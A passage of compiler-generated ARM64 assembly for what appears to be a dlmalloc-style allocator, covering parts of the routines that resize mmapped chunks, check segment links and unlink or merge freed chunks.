orr w8, w8, w10
str w8, [x9]
b LBB39_19
LBB39_15:
ldr x8, [sp, #136]
ldr x8, [x8, #16]
ldur x9, [x29, #-24]
ldr x9, [x9, #24]
subs x8, x8, x9
cset w9, hs
; implicit-def: $x8
mov x8, x9
ands x8, x8, #0x1
cset w8, eq
tbnz w8, #0, LBB39_17
b LBB39_16
LBB39_16:
ldr x8, [sp, #136]
ldr x8, [x8, #16]
str x8, [sp, #128]
b LBB39_18
LBB39_17:
bl _abort
LBB39_18:
b LBB39_19
LBB39_19:
ldr x8, [sp, #168]
ldr x9, [sp, #136]
str x8, [x9, #16]
ldr x8, [sp, #168]
ldr x9, [sp, #128]
str x8, [x9, #24]
ldr x8, [sp, #128]
ldr x9, [sp, #168]
str x8, [x9, #16]
ldr x8, [sp, #136]
ldr x9, [sp, #168]
str x8, [x9, #24]
b LBB39_47
LBB39_20:
ldr x8, [sp, #168]
str x8, [sp, #120]
ldr x8, [sp, #160]
lsr x8, x8, #8
str x8, [sp, #96]
ldr x8, [sp, #96]
subs x8, x8, #0
cset w8, ne
tbnz w8, #0, LBB39_22
b LBB39_21
LBB39_21:
str wzr, [sp, #108]
b LBB39_26
LBB39_22:
ldr x8, [sp, #96]
subs x8, x8, #16, lsl #12 ; =65536
cset w8, lo
tbnz w8, #0, LBB39_24
b LBB39_23
LBB39_23:
mov w8, #31
str w8, [sp, #108]
b LBB39_25
LBB39_24:
ldr x8, [sp, #96]
; kill: def $w8 killed $w8 killed $x8
str w8, [sp, #92]
ldr w8, [sp, #92]
subs w8, w8, #256
lsr w8, w8, #16
and w8, w8, #0x8
str w8, [sp, #88]
ldr w9, [sp, #88]
ldr w8, [sp, #92]
lsl w8, w8, w9
str w8, [sp, #92]
subs w8, w8, #1, lsl #12 ; =4096
lsr w8, w8, #16
and w8, w8, #0x4
str w8, [sp, #84]
ldr w9, [sp, #84]
ldr w8, [sp, #88]
add w8, w8, w9
str w8, [sp, #88]
ldr w9, [sp, #84]
ldr w8, [sp, #92]
lsl w8, w8, w9
str w8, [sp, #92]
subs w8, w8, #4, lsl #12 ; =16384
lsr w8, w8, #16
and w9, w8, #0x2
str w9, [sp, #84]
ldr w8, [sp, #88]
add w8, w8, w9
str w8, [sp, #88]
ldr w9, [sp, #88]
mov w8, #14
subs w8, w8, w9
ldr w10, [sp, #84]
ldr w9, [sp, #92]
lsl w9, w9, w10
str w9, [sp, #92]
add w8, w8, w9, lsr #15
str w8, [sp, #84]
ldr w8, [sp, #84]
lsl w8, w8, #1
; kill: def $x8 killed $w8
ldr x9, [sp, #160]
ldr w10, [sp, #84]
add w10, w10, #7
; kill: def $x10 killed $w10
lsr x9, x9, x10
and x9, x9, #0x1
add x8, x8, x9
; kill: def $w8 killed $w8 killed $x8
str w8, [sp, #108]
b LBB39_25
LBB39_25:
b LBB39_26
LBB39_26:
ldur x8, [x29, #-24]
add x8, x8, #600
ldr w9, [sp, #108]
; kill: def $x9 killed $w9
add x8, x8, x9, lsl #3
str x8, [sp, #112]
ldr w8, [sp, #108]
ldr x9, [sp, #120]
str w8, [x9, #56]
ldr x8, [sp, #120]
; kill: def $x9 killed $xzr
str xzr, [x8, #40]
ldr x8, [sp, #120]
str xzr, [x8, #32]
ldur x8, [x29, #-24]
ldr w8, [x8, #4]
ldr w10, [sp, #108]
mov w9, #1
lsl w9, w9, w10
ands w8, w8, w9
cset w8, ne
tbnz w8, #0, LBB39_28
b LBB39_27
LBB39_27:
ldr w9, [sp, #108]
mov w8, #1
lsl w10, w8, w9
ldur x9, [x29, #-24]
ldr w8, [x9, #4]
orr w8, w8, w10
str w8, [x9, #4]
ldr x8, [sp, #120]
ldr x9, [sp, #112]
str x8, [x9]
ldr x8, [sp, #112]
ldr x9, [sp, #120]
str x8, [x9, #48]
ldr x8, [sp, #120]
ldr x9, [sp, #120]
str x8, [x9, #24]
ldr x9, [sp, #120]
str x8, [x9, #16]
b LBB39_46
LBB39_28:
ldr x8, [sp, #112]
ldr x8, [x8]
str x8, [sp, #72]
ldr x8, [sp, #160]
str x8, [sp, #24] ; 8-byte Folded Spill
ldr w8, [sp, #108]
subs w8, w8, #31
cset w8, ne
tbnz w8, #0, LBB39_30
b LBB39_29
LBB39_29:
mov x8, #0
str x8, [sp, #16] ; 8-byte Folded Spill
b LBB39_31
LBB39_30:
ldr w8, [sp, #108]
lsr w8, w8, #1
add w8, w8, #8
subs w8, w8, #2
mov x9, x8
mov x8, #63
subs x8, x8, x9
str x8, [sp, #16] ; 8-byte Folded Spill
b LBB39_31
LBB39_31:
ldr x8, [sp, #24] ; 8-byte Folded Reload
ldr x9, [sp, #16] ; 8-byte Folded Reload
lsl x8, x8, x9
str x8, [sp, #64]
b LBB39_32
LBB39_32: ; =>This Inner Loop Header: Depth=1
ldr x8, [sp, #72]
ldr x8, [x8, #8]
and x8, x8, #0xfffffffffffffff8
ldr x9, [sp, #160]
subs x8, x8, x9
cset w8, eq
tbnz w8, #0, LBB39_39
b LBB39_33
LBB39_33: ; in Loop: Header=BB39_32 Depth=1
ldr x8, [sp, #72]
add x8, x8, #32
ldr x9, [sp, #64]
lsr x9, x9, #63
and x9, x9, #0x1
add x8, x8, x9, lsl #3
str x8, [sp, #56]
ldr x8, [sp, #64]
lsl x8, x8, #1
str x8, [sp, #64]
ldr x8, [sp, #56]
ldr x8, [x8]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB39_35
b LBB39_34
LBB39_34: ; in Loop: Header=BB39_32 Depth=1
ldr x8, [sp, #56]
ldr x8, [x8]
str x8, [sp, #72]
b LBB39_38
LBB39_35:
ldr x8, [sp, #56]
ldur x9, [x29, #-24]
ldr x9, [x9, #24]
subs x8, x8, x9
cset w9, hs
; implicit-def: $x8
mov x8, x9
ands x8, x8, #0x1
cset w8, eq
tbnz w8, #0, LBB39_37
b LBB39_36
LBB39_36:
ldr x8, [sp, #120]
ldr x9, [sp, #56]
str x8, [x9]
ldr x8, [sp, #72]
ldr x9, [sp, #120]
str x8, [x9, #48]
ldr x8, [sp, #120]
ldr x9, [sp, #120]
str x8, [x9, #24]
ldr x9, [sp, #120]
str x8, [x9, #16]
b LBB39_45
LBB39_37:
bl _abort
LBB39_38: ; in Loop: Header=BB39_32 Depth=1
b LBB39_44
LBB39_39:
ldr x8, [sp, #72]
ldr x8, [x8, #16]
str x8, [sp, #48]
ldr x8, [sp, #72]
ldur x9, [x29, #-24]
ldr x9, [x9, #24]
subs x8, x8, x9
cset w8, lo
mov w9, #0
str w9, [sp, #12] ; 4-byte Folded Spill
tbnz w8, #0, LBB39_41
b LBB39_40
LBB39_40:
ldr x8, [sp, #48]
ldur x9, [x29, #-24]
ldr x9, [x9, #24]
subs x8, x8, x9
cset w8, hs
str w8, [sp, #12] ; 4-byte Folded Spill
b LBB39_41
LBB39_41:
ldr w8, [sp, #12] ; 4-byte Folded Reload
; kill: def $x8 killed $w8
ands x8, x8, #0x1
cset w8, eq
tbnz w8, #0, LBB39_43
b LBB39_42
LBB39_42:
ldr x8, [sp, #120]
ldr x9, [sp, #48]
str x8, [x9, #24]
ldr x9, [sp, #72]
str x8, [x9, #16]
ldr x8, [sp, #48]
ldr x9, [sp, #120]
str x8, [x9, #16]
ldr x8, [sp, #72]
ldr x9, [sp, #120]
str x8, [x9, #24]
ldr x8, [sp, #120]
; kill: def $x9 killed $xzr
str xzr, [x8, #48]
b LBB39_45
LBB39_43:
bl _abort
LBB39_44: ; in Loop: Header=BB39_32 Depth=1
b LBB39_32
LBB39_45:
b LBB39_46
LBB39_46:
b LBB39_47
LBB39_47:
b LBB39_48
LBB39_48:
ldp x29, x30, [sp, #336] ; 16-byte Folded Reload
ldp x28, x27, [sp, #320] ; 16-byte Folded Reload
add sp, sp, #352
ret
.cfi_endproc
; -- End function
.p2align 2 ; -- Begin function has_segment_link
_has_segment_link: ; @has_segment_link
.cfi_startproc
; %bb.0:
sub sp, sp, #32
.cfi_def_cfa_offset 32
str x0, [sp, #16]
str x1, [sp, #8]
ldr x8, [sp, #16]
add x8, x8, #888
str x8, [sp]
b LBB40_1
LBB40_1: ; =>This Inner Loop Header: Depth=1
ldr x8, [sp]
ldr x9, [sp, #8]
ldr x9, [x9]
subs x8, x8, x9
cset w8, lo
tbnz w8, #0, LBB40_4
b LBB40_2
LBB40_2: ; in Loop: Header=BB40_1 Depth=1
ldr x8, [sp]
ldr x9, [sp, #8]
ldr x9, [x9]
ldr x10, [sp, #8]
ldr x10, [x10, #8]
add x9, x9, x10
subs x8, x8, x9
cset w8, hs
tbnz w8, #0, LBB40_4
b LBB40_3
LBB40_3:
mov w8, #1
str w8, [sp, #28]
b LBB40_7
LBB40_4: ; in Loop: Header=BB40_1 Depth=1
ldr x8, [sp]
ldr x8, [x8, #16]
mov x9, x8
str x9, [sp]
subs x8, x8, #0
cset w8, ne
tbnz w8, #0, LBB40_6
b LBB40_5
LBB40_5:
str wzr, [sp, #28]
b LBB40_7
LBB40_6: ; in Loop: Header=BB40_1 Depth=1
b LBB40_1
LBB40_7:
ldr w0, [sp, #28]
add sp, sp, #32
ret
.cfi_endproc
; -- End function
.p2align 2 ; -- Begin function mmap_resize
_mmap_resize: ; @mmap_resize
.cfi_startproc
; %bb.0:
sub sp, sp, #112
.cfi_def_cfa_offset 112
adrp x8, _mparams@PAGE
add x8, x8, _mparams@PAGEOFF
str x8, [sp, #8] ; 8-byte Folded Spill
str x0, [sp, #96]
str x1, [sp, #88]
str x2, [sp, #80]
str w3, [sp, #76]
ldr x8, [sp, #88]
ldr x8, [x8, #8]
and x8, x8, #0xfffffffffffffff8
str x8, [sp, #64]
ldr x8, [sp, #80]
lsr x8, x8, #3
subs x8, x8, #32
cset w8, hs
tbnz w8, #0, LBB41_2
b LBB41_1
LBB41_1:
; kill: def $x8 killed $xzr
str xzr, [sp, #104]
b LBB41_13
LBB41_2:
ldr x8, [sp, #64]
ldr x9, [sp, #80]
add x9, x9, #8
subs x8, x8, x9
cset w8, lo
tbnz w8, #0, LBB41_5
b LBB41_3
LBB41_3:
ldr x9, [sp, #8] ; 8-byte Folded Reload
ldr x8, [sp, #64]
ldr x10, [sp, #80]
subs x8, x8, x10
ldr x9, [x9, #16]
subs x8, x8, x9, lsl #1
cset w8, hi
tbnz w8, #0, LBB41_5
b LBB41_4
LBB41_4:
ldr x8, [sp, #88]
str x8, [sp, #104]
b LBB41_13
LBB41_5:
ldr x8, [sp, #8] ; 8-byte Folded Reload
ldr x9, [sp, #88]
ldr x9, [x9]
str x9, [sp, #56]
ldr x9, [sp, #64]
ldr x10, [sp, #56]
add x9, x9, x10
add x9, x9, #32
str x9, [sp, #48]
ldr x9, [sp, #80]
add x9, x9, #48
add x9, x9, #15
ldr x10, [x8, #8]
subs x10, x10, #1
add x9, x9, x10
ldr x8, [x8, #8]
subs x10, x8, #1
mov x8, #-1
bic x9, x9, x10
str x9, [sp, #40]
str x8, [sp, #32]
ldr x8, [sp, #32]
adds x8, x8, #1
cset w8, eq
tbnz w8, #0, LBB41_11
b LBB41_6
LBB41_6:
ldr x8, [sp, #32]
ldr x9, [sp, #56]
add x8, x8, x9
str x8, [sp, #24]
ldr x8, [sp, #40]
ldr x9, [sp, #56]
subs x8, x8, x9
subs x8, x8, #32
str x8, [sp, #16]
ldr x8, [sp, #16]
ldr x9, [sp, #24]
str x8, [x9, #8]
ldr x8, [sp, #24]
ldr x9, [sp, #16]
add x9, x8, x9
mov x8, #11
str x8, [x9, #8]
ldr x8, [sp, #24]
ldr x9, [sp, #16]
add x9, x9, #8
add x8, x8, x9
str xzr, [x8, #8]
ldr x8, [sp, #32]
ldr x9, [sp, #96]
ldr x9, [x9, #24]
subs x8, x8, x9
cset w8, hs
tbnz w8, #0, LBB41_8
b LBB41_7
LBB41_7:
ldr x8, [sp, #32]
ldr x9, [sp, #96]
str x8, [x9, #24]
b LBB41_8
LBB41_8:
ldr x8, [sp, #40]
ldr x9, [sp, #48]
subs x10, x8, x9
ldr x9, [sp, #96]
ldr x8, [x9, #856]
add x8, x8, x10
str x8, [x9, #856]
ldr x9, [sp, #96]
ldr x9, [x9, #864]
subs x8, x8, x9
cset w8, ls
tbnz w8, #0, LBB41_10
b LBB41_9
LBB41_9:
ldr x8, [sp, #96]
ldr x8, [x8, #856]
ldr x9, [sp, #96]
str x8, [x9, #864]
b LBB41_10
LBB41_10:
ldr x8, [sp, #24]
str x8, [sp, #104]
b LBB41_13
LBB41_11:
b LBB41_12
LBB41_12:
; kill: def $x8 killed $xzr
str xzr, [sp, #104]
b LBB41_13
LBB41_13:
ldr x0, [sp, #104]
add sp, sp, #112
ret
.cfi_endproc
; -- End function
.p2align 2 ; -- Begin function dispose_chunk
_dispose_chunk: ; @dispose_chunk
.cfi_startproc
; %bb.0:
sub sp, sp, #480
.cfi_def_cfa_offset 480
stp x28, x27, [sp, #448] ; 16-byte Folded Spill
stp x29, x30, [sp, #464] ; 16-byte Folded Spill
add x29, sp, #464
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
.cfi_offset w27, -24
.cfi_offset w28, -32
stur x0, [x29, #-24]
stur x1, [x29, #-32]
stur x2, [x29, #-40]
ldur x8, [x29, #-32]
ldur x9, [x29, #-40]
add x8, x8, x9
stur x8, [x29, #-48]
ldur x8, [x29, #-32]
ldr x8, [x8, #8]
ands x8, x8, #0x1
cset w8, ne
tbnz w8, #0, LBB42_82
b LBB42_1
LBB42_1:
ldur x8, [x29, #-32]
ldr x8, [x8]
stur x8, [x29, #-64]
ldur x8, [x29, #-32]
ldr x8, [x8, #8]
ands x8, x8, #0x3
cset w8, ne
tbnz w8, #0, LBB42_5
b LBB42_2
LBB42_2:
ldur x8, [x29, #-64]
add x9, x8, #32
ldur x8, [x29, #-40]
add x8, x8, x9
stur x8, [x29, #-40]
ldur x8, [x29, #-32]
ldur x9, [x29, #-64]
subs x0, x8, x9
ldur x1, [x29, #-40]
bl _munmap
subs w8, w0, #0
cset w8, ne
tbnz w8, #0, LBB42_4
b LBB42_3
LBB42_3:
ldur x10, [x29, #-40]
ldur x9, [x29, #-24]
ldr x8, [x9, #856]
subs x8, x8, x10
str x8, [x9, #856]
b LBB42_4
LBB42_4:
b LBB42_201
LBB42_5:
ldur x8, [x29, #-32]
ldur x9, [x29, #-64]
subs x8, x8, x9
stur x8, [x29, #-56]
ldur x9, [x29, #-64]
ldur x8, [x29, #-40]
add x8, x8, x9
stur x8, [x29, #-40]
ldur x8, [x29, #-56]
stur x8, [x29, #-32]
ldur x8, [x29, #-56]
ldur x9, [x29, #-24]
ldr x9, [x9, #24]
subs x8, x8, x9
cset w9, hs
; implicit-def: $x8
mov x8, x9
ands x8, x8, #0x1
cset w8, eq
tbnz w8, #0, LBB42_80
b LBB42_6
LBB42_6:
ldur x8, [x29, #-32]
ldur x9, [x29, #-24]
ldr x9, [x9, #32]
subs x8, x8, x9
cset w8, eq
tbnz w8, #0, LBB42_76
b LBB42_7
LBB42_7:
ldur x8, [x29, #-64]
lsr x8, x8, #3
subs x8, x8, #32
cset w8, hs
tbnz w8, #0, LBB42_26
b LBB42_8
LBB42_8:
ldur x8, [x29, #-32]
ldr x8, [x8, #16]
stur x8, [x29, #-72]
ldur x8, [x29, #-32]
ldr x8, [x8, #24]
stur x8, [x29, #-80]
ldur x8, [x29, #-64]
lsr x8, x8, #3
; kill: def $w8 killed $w8 killed $x8
stur w8, [x29, #-84]
ldur x8, [x29, #-72]
ldur x9, [x29, #-24]
add x9, x9, #72
ldur w10, [x29, #-84]
lsl w10, w10, #1
add x9, x9, w10, uxtw #3
subs x8, x8, x9
cset w8, eq
mov w9, #1
str w9, [sp, #76] ; 4-byte Folded Spill
tbnz w8, #0, LBB42_12
b LBB42_9
LBB42_9:
ldur x8, [x29, #-72]
ldur x9, [x29, #-24]
ldr x9, [x9, #24]
subs x8, x8, x9
cset w8, lo
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB42_11
b LBB42_10
LBB42_10:
ldur x8, [x29, #-72]
ldr x8, [x8, #24]
ldur x9, [x29, #-32]
subs x8, x8, x9
cset w8, eq
str w8, [sp, #72] ; 4-byte Folded Spill
b LBB42_11
LBB42_11:
ldr w8, [sp, #72] ; 4-byte Folded Reload
str w8, [sp, #76] ; 4-byte Folded Spill
b LBB42_12
LBB42_12:
ldr w8, [sp, #76] ; 4-byte Folded Reload
; kill: def $x8 killed $w8
ands x8, x8, #0x1
cset w8, eq
tbnz w8, #0, LBB42_24
b LBB42_13
LBB42_13:
ldur x8, [x29, #-80]
ldur x9, [x29, #-72]
subs x8, x8, x9
cset w8, ne
tbnz w8, #0, LBB42_15
b LBB42_14
LBB42_14:
ldur w9, [x29, #-84]
mov w8, #1
lsl w10, w8, w9
ldur x9, [x29, #-24]
ldr w8, [x9]
bic w8, w8, w10
str w8, [x9]
b LBB42_23
LBB42_15:
ldur x8, [x29, #-80]
ldur x9, [x29, #-24]
add x9, x9, #72
ldur w10, [x29, #-84]
lsl w10, w10, #1
add x9, x9, w10, uxtw #3
subs x8, x8, x9
cset w8, eq
mov w9, #1
str w9, [sp, #68] ; 4-byte Folded Spill
tbnz w8, #0, LBB42_19
b LBB42_16
LBB42_16:
ldur x8, [x29, #-80]
ldur x9, [x29, #-24]
ldr x9, [x9, #24]
subs x8, x8, x9
cset w8, lo
mov w9, #0
str w9, [sp, #64] ; 4-byte Folded Spill
tbnz w8, #0, LBB42_18
b LBB42_17
LBB42_17:
ldur x8, [x29, #-80]
ldr x8, [x8, #16]
ldur x9, [x29, #-32]
subs x8, x8, x9
cset w8, eq
str w8, [sp, #64] ; 4-byte Folded Spill
b LBB42_18
LBB42_18:
ldr w8, [sp, #64] ; 4-byte Folded Reload
str w8, [sp, #68] ; 4-byte Folded Spill
b LBB42_19
LBB42_19:
ldr w8, [sp, #68] ; 4-byte Folded Reload
; kill: def $x8 killed $w8
ands x8, x8, #0x1
cset w8, eq
tbnz w8, #0, LBB42_21
b LBB42_20
LBB42_20:
ldur x8, [x29, #-80]
ldur x9, [x29, #-72]
str x8, [x9, #24]
ldur x8, [x29, #-72]
ldur x9, [x29, #-80]
str x8, [x9, #16]
b LBB42_22
LBB42_21:
bl _abort
LBB42_22:
b LBB42_23
LBB42_23:
b LBB42_25
LBB42_24:
bl _abort
LBB42_25:
b LBB42_75
LBB42_26:
ldur x8, [x29, #-32]
stur x8, [x29, #-96]
ldur x8, [x29, #-96]
ldr x8, [x8, #48]
stur x8, [x29, #-104]
ldur x8, [x29, #-96]
ldr x8, [x8, #24]
ldur x9, [x29, #-96]
subs x8, x8, x9
cset w8, eq
tbnz w8, #0, LBB42_34
b LBB42_27
LBB42_27:
ldur x8, [x29, #-96]
ldr x8, [x8, #16]
stur x8, [x29, #-120]
ldur x8, [x29, #-96]
ldr x8, [x8, #24]
stur x8, [x29, #-112]
ldur x8, [x29, #-120]
ldur x9, [x29, #-24]
ldr x9, [x9, #24]
subs x8, x8, x9
cset w8, lo
mov w9, #0
str w9, [sp, #60] ; 4-byte Folded Spill
tbnz w8, #0, LBB42_30
b LBB42_28
LBB42_28:
ldur x8, [x29, #-120]
ldr x8, [x8, #24]
ldur x9, [x29, #-96]
subs x8, x8, x9
cset w8, ne
mov w9, #0
str w9, [sp, #60] ; 4-byte Folded Spill
tbnz w8, #0, LBB42_30
b LBB42_29
LBB42_29:
ldur x8, [x29, #-112]
ldr x8, [x8, #16]
ldur x9, [x29, #-96]
subs x8, x8, x9
cset w8, eq
str w8, [sp, #60] ; 4-byte Folded Spill
b LBB42_30
LBB42_30:
ldr w8, [sp, #60] ; 4-byte Folded Reload
; kill: def $x8 killed $w8
ands x8, x8, #0x1
cset w8, eq
tbnz w8, #0, LBB42_32
b LBB42_31
LBB42_31:
ldur x8, [x29, #-112]
ldur x9, [x29, #-120]
str x8, [x9, #24]
ldur x8, [x29, #-120]
ldur x9, [x29, #-112]
str x8, [x9, #16]
b LBB42_33
LBB42_32:
bl _abort
LBB42_33:
b LBB42_46
LBB42_34:
ldur x8, [x29, #-96]
add x9, x8, #40
stur x9, [x29, #-128]
ldr x8, [x8, #40]
mov x9, x8
stur x9, [x29, #-112]
subs x8, x8, #0
cset w8, ne
tbnz w8, #0, LBB42_36
b LBB42_35
LBB42_35:
ldur x8, [x29, #-96]
add x9, x8, #32
stur x9, [x29, #-128]
ldr x8, [x8, #32]
mov x9, x8
stur x9, [x29, #-112]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB42_45
b LBB42_36
LBB42_36:
b LBB42_37
LBB42_37: ; =>This Inner Loop Header: Depth=1
ldur x8, [x29, #-112]
add x9, x8, #40
stur x9, [x29, #-136]
ldr x8, [x8, #40]
subs x8, x8, #0
cset w8, ne
mov w9, #1
str w9, [sp, #56] ; 4-byte Folded Spill
tbnz w8, #0, LBB42_39
b LBB42_38
LBB42_38: ; in Loop: Header=BB42_37 Depth=1
ldur x8, [x29, #-112]
add x9, x8, #32
stur x9, [x29, #-136]
ldr x8, [x8, #32]
subs x8, x8, #0
cset w8, ne
str w8, [sp, #56] ; 4-byte Folded Spill
b LBB42_39
LBB42_39: ; in Loop: Header=BB42_37 Depth=1
ldr w8, [sp, #56] ; 4-byte Folded Reload
tbz w8, #0, LBB42_41
b LBB42_40
LBB42_40: ; in Loop: Header=BB42_37 Depth=1
ldur x8, [x29, #-136]
mov x9, x8
stur x9, [x29, #-128]
ldr x8, [x8]
stur x8, [x29, #-112]
b LBB42_37
LBB42_41:
ldur x8, [x29, #-128]
ldur x9, [x29, #-24]
ldr x9, [x9, #24]
subs x8, x8, x9
cset w9, hs
; implicit-def: $x8
mov x8, x9
ands x8, x8, #0x1
cset w8, eq
tbnz w8, #0, LBB42_43
b LBB42_42
LBB42_42:
ldur x8, [x29, #-128]
; kill: def $x9 killed $xzr
str xzr, [x8]
b LBB42_44
LBB42_43:
bl _abort
LBB42_44:
b LBB42_45
LBB42_45:
b LBB42_46
LBB42_46:
ldur x8, [x29, #-104]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB42_74
b LBB42_47
LBB42_47:
ldur x8, [x29, #-24]
add x8, x8, #600
ldur x9, [x29, #-96]
ldr w9, [x9, #56]
; kill: def $x9 killed $w9
add x8, x8, x9, lsl #3
stur x8, [x29, #-144]
ldur x8, [x29, #-96]
ldur x9, [x29, #-144]
ldr x9, [x9]
subs x8, x8, x9
cset w8, ne
tbnz w8, #0, LBB42_51
b LBB42_48
LBB42_48:
ldur x8, [x29, #-112]
ldur x10, [x29, #-144]
mov x9, x8
str x9, [x10]
subs x8, x8, #0
cset w8, ne
tbnz w8, #0, LBB42_50
b LBB42_49
LBB42_49:
ldur x8, [x29, #-96]
ldr w9, [x8, #56]
mov w8, #1
lsl w10, w8, w9
ldur x9, [x29, #-24]
ldr w8, [x9, #4]
bic w8, w8, w10
str w8, [x9, #4]
b LBB42_50
LBB42_50:
b LBB42_58
LBB42_51:
ldur x8, [x29, #-104]
ldur x9, [x29, #-24]
ldr x9, [x9, #24]
subs x8, x8, x9
cset w9, hs
; implicit-def: $x8
mov x8, x9
ands x8, x8, #0x1
cset w8, eq
tbnz w8, #0, LBB42_56
b LBB42_52
LBB42_52:
ldur x8, [x29, #-104]
ldr x8, [x8, #32]
ldur x9, [x29, #-96]
subs x8, x8, x9
cset w8, ne
tbnz w8, #0, LBB42_54
b LBB42_53
LBB42_53:
ldur x8, [x29, #-112]
ldur x9, [x29, #-104]
str x8, [x9, #32]
b LBB42_55
LBB42_54:
ldur x8, [x29, #-112]
ldur x9, [x29, #-104]
str x8, [x9, #40]
b LBB42_55
LBB42_55:
b LBB42_57
LBB42_56:
bl _abort
LBB42_57:
b LBB42_58
LBB42_58:
ldur x8, [x29, #-112]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB42_73
b LBB42_59
LBB42_59:
ldur x8, [x29, #-112]
ldur x9, [x29, #-24]
ldr x9, [x9, #24]
subs x8, x8, x9
cset w9, hs
; implicit-def: $x8
mov x8, x9
ands x8, x8, #0x1
cset w8, eq
tbnz w8, #0, LBB42_71
b LBB42_60
LBB42_60:
ldur x8, [x29, #-104]
ldur x9, [x29, #-112]
str x8, [x9, #48]
ldur x8, [x29, #-96]
ldr x8, [x8, #32]
mov x9, x8
stur x9, [x29, #-152]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB42_65
b LBB42_61
LBB42_61:
ldur x8, [x29, #-152]
ldur x9, [x29, #-24]
ldr x9, [x9, #24]
subs x8, x8, x9
cset w9, hs
; implicit-def: $x8
mov x8, x9
ands x8, x8, #0x1
cset w8, eq
tbnz w8, #0, LBB42_63
b LBB42_62
LBB42_62:
ldur x8, [x29, #-152]
ldur x9, [x29, #-112]
str x8, [x9, #32]
ldur x8, [x29, #-112]
ldur x9, [x29, #-152]
str x8, [x9, #48]
b LBB42_64
LBB42_63:
bl _abort
LBB42_64:
b LBB42_65
LBB42_65:
ldur x8, [x29, #-96]
ldr x8, [x8, #40]
mov x9, x8
stur x9, [x29, #-160]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB42_70
b LBB42_66
LBB42_66:
ldur x8, [x29, #-160]
ldur x9, [x29, #-24]
ldr x9, [x9, #24]
subs x8, x8, x9
cset w9, hs
; implicit-def: $x8
mov x8, x9
ands x8, x8, #0x1
cset w8, eq
tbnz w8, #0, LBB42_68
b LBB42_67
LBB42_67:
ldur x8, [x29, #-160]
ldur x9, [x29, #-112]
str x8, [x9, #40]
ldur x8, [x29, #-112]
ldur x9, [x29, #-160]
str x8, [x9, #48]
b LBB42_69
LBB42_68:
bl _abort
LBB42_69:
b LBB42_70
LBB42_70:
b LBB42_72
LBB42_71:
bl _abort
LBB42_72:
b LBB42_73
LBB42_73:
b LBB42_74
LBB42_74:
b LBB42_75
LBB42_75:
b LBB42_79
LBB42_76:
ldur x8, [x29, #-48]
ldr x8, [x8, #8]
and x8, x8, #0x3
subs x8, x8, #3
cset w8, ne
tbnz w8, #0, LBB42_78
b LBB42_77
LBB42_77:
ldur x8, [x29, #-40]
ldur x9, [x29, #-24]
str x8, [x9, #8]
ldur x9, [x29, #-48]
ldr x8, [x9, #8]
and x8, x8, #0xfffffffffffffffe
str x8, [x9, #8]
ldur x8, [x29, #-40]
orr x8, x8, #0x1
ldur x9, [x29, #-32]
str x8, [x9, #8]
ldur x8, [x29, #-40]
ldur x9, [x29, #-32]
ldur x10, [x29, #-40]
str x8, [x9, x10]
b LBB42_201
LBB42_78:
b LBB42_79
LBB42_79:
b LBB42_81
LBB42_80:
bl _abort
LBB42_81:
b LBB42_82
LBB42_82:
ldur x8, [x29, #-48]
ldur x9, [x29, #-24]
ldr x9, [x9, #24]
subs x8, x8, x9
cset w9, hs
; implicit-def: $x8
mov x8, x9
ands x8, x8, #0x1
cset w8, eq
tbnz w8, #0, LBB42_200
b LBB42_83
LBB42_83:
ldur x8, [x29, #-48]
ldr x8, [x8, #8]
ands x8, x8, #0x2
cset w8, ne
tbnz w8, #0, LBB42_163
b LBB42_84
LBB42_84:
ldur x8, [x29, #-48]
ldur x9, [x29, #-24]
ldr x9, [x9, #40]
subs x8, x8, x9
cset w8, ne
tbnz w8, #0, LBB42_88
b LBB42_85
LBB42_85:
ldur x10, [x29, #-40]
ldur x9, [x29, #-24]
ldr x8, [x9, #16]
add x8, x8, x10
str x8, [x9, #16]
stur x8, [x29, #-168]
ldur x8, [x29, #-32]
ldur x9, [x29, #-24]
str x8, [x9, #40]
ldur x8, [x29, #-168]
orr x8, x8, #0x1
ldur x9, [x29, #-32]
str x8, [x9, #8]
ldur x8, [x29, #-32]
ldur x9, [x29, #-24]
ldr x9, [x9, #32]
subs x8, x8, x9
cset w8, ne
tbnz w8, #0, LBB42_87
b LBB42_86
LBB42_86:
ldur x8, [x29, #-24]
; kill: def $x9 killed $xzr
str xzr, [x8, #32]
ldur x8, [x29, #-24]
str xzr, [x8, #8]
b LBB42_87
LBB42_87:
b LBB42_201
LBB42_88:
ldur x8, [x29, #-48]
ldur x9, [x29, #-24]
ldr x9, [x9, #32]
subs x8, x8, x9
cset w8, ne
tbnz w8, #0, LBB42_90
b LBB42_89
LBB42_89:
ldur x10, [x29, #-40]
ldur x9, [x29, #-24]
ldr x8, [x9, #8]
add x8, x8, x10
str x8, [x9, #8]
stur x8, [x29, #-176]
ldur x8, [x29, #-32]
ldur x9, [x29, #-24]
str x8, [x9, #32]
ldur x8, [x29, #-176]
orr x8, x8, #0x1
ldur x9, [x29, #-32]
str x8, [x9, #8]
ldur x8, [x29, #-176]
ldur x9, [x29, #-32]
ldur x10, [x29, #-176]
str x8, [x9, x10]
b LBB42_201
LBB42_90:
ldur x8, [x29, #-48]
ldr x8, [x8, #8]
and x8, x8, #0xfffffffffffffff8
stur x8, [x29, #-184]
ldur x9, [x29, #-184]
ldur x8, [x29, #-40]
add x8, x8, x9
stur x8, [x29, #-40]
ldur x8, [x29, #-184]
lsr x8, x8, #3
subs x8, x8, #32
cset w8, hs
tbnz w8, #0, LBB42_109
b LBB42_91
LBB42_91:
ldur x8, [x29, #-48]
ldr x8, [x8, #16]
stur x8, [x29, #-192]
ldur x8, [x29, #-48]
ldr x8, [x8, #24]
stur x8, [x29, #-200]
ldur x8, [x29, #-184]
lsr x8, x8, #3
; kill: def $w8 killed $w8 killed $x8
stur w8, [x29, #-204]
ldur x8, [x29, #-192]
ldur x9, [x29, #-24]
add x9, x9, #72
ldur w10, [x29, #-204]
lsl w10, w10, #1
add x9, x9, w10, uxtw #3
subs x8, x8, x9
cset w8, eq
mov w9, #1
str w9, [sp, #52] ; 4-byte Folded Spill
tbnz w8, #0, LBB42_95
b LBB42_92
LBB42_92:
